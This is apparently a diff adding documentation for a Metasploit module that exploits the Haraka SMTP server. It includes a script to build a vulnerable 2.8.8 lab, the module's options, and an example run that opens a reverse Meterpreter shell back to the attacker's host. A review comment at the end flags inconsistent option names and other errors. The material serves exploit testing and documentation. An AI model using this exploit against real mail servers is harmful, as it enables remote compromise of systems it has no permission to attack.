|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar: |
| 4 | + |
| 5 | + ``` |
| 6 | + #install nodejs and npm |
| 7 | + curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - |
| 8 | + sudo apt install nodejs |
| 9 | +
|
| 10 | + #Haraka setup |
| 11 | + wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz |
| 12 | + tar xvzf v2.8.8.tar.gz |
| 13 | + cd Haraka-2.8.8/ |
| 14 | + npm install npm |
| 15 | + npm install |
| 16 | +
|
| 17 | + haraka -i haraka |
| 18 | +
|
| 19 | + cat << EOF > haraka/config/plugins |
| 20 | + access |
| 21 | + rcpt_to.in_host_list |
| 22 | + data.headers |
| 23 | + attachment |
| 24 | + test_queue |
| 25 | + max_unrecognized_commands |
| 26 | + EOF |
| 27 | +
|
| 28 | + echo haraka.test >> haraka/config/host_list |
| 29 | +
|
| 30 | + # Launch haraka as root |
| 31 | + sudo haraka -c haraka |
| 32 | + ``` |
| 33 | + |
| 34 | +## Options |
| 35 | + |
| 36 | + **from_email** |
| 37 | + |
| 38 | + String used in the SMTP MAILFROM command |
| 39 | + |
| 40 | + **to_email** |
| 41 | + |
| 42 | + String used in the SMTP MAILTO command |
| 43 | + |
| 44 | + **lhost** |
| 45 | + |
| 46 | + The address to serve the payload from |
| 47 | + |
| 48 | + **rhost** |
| 49 | + |
| 50 | + The address or hostname to target |
| 51 | + |
| 52 | + **payload** |
| 53 | + |
| 54 | + Any compatible Metasploit payload |
| 55 | + |
| 56 | +## Example Run |
| 57 | + |
| 58 | + ``` |
| 59 | +msf > use exploit/linux/smtp/harakiri |
| 60 | +msf exploit(haraka) > set email_to [email protected] |
| 61 | + |
| 62 | +msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http |
| 63 | +payload => linux/x64/meterpreter_reverse_http |
| 64 | +msf exploit(haraka) > run |
| 65 | +
|
| 66 | +[*] Started HTTP reverse handler on http://192.168.1.1:8080 |
| 67 | +[*] Exploiting... |
| 68 | +[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3 |
| 69 | +[*] Sending mail to target server... |
| 70 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' |
| 71 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session... |
| 72 | +[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500 |
| 73 | +[*] Command Stager progress - 100.00% done (120/120 bytes) |
| 74 | +[*] Server stopped. |
| 75 | +
|
| 76 | +meterpreter > exit |
| 77 | +[*] Shutting down Meterpreter... |
| 78 | +
|
| 79 | +[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit |
| 80 | +msf exploit(haraka) > |
| 81 | + ``` |
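Review bot: The Options section documents `from_email` and `to_email`, but the Example Run sets `email_to`, and the console echo for that `set` is missing, so a reader cannot tell which option name the module accepts. Use the same names in both sections and show the echoed value. The example also loads `exploit/linux/smtp/harakiri` while the prompt reads `exploit(haraka)`, and it never sets `rhost` or `lhost` even though both are listed as options. In the option descriptions, the SMTP commands are `MAIL FROM` and `RCPT TO`, not MAILFROM and MAILTO. In the setup script, `haraka -i haraka` follows a local `npm install` with no step that puts `haraka` on the PATH. Either add a global install or invoke the binary by its path in the extracted tree. A sentence naming which of the enabled plugins the lab depends on, and noting that `sudo haraka -c haraka` runs the server as root, would also help anyone building the test host.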